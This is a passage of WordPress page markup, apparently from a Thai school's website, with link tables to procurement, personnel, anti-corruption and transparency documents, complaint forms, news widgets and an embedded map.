data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 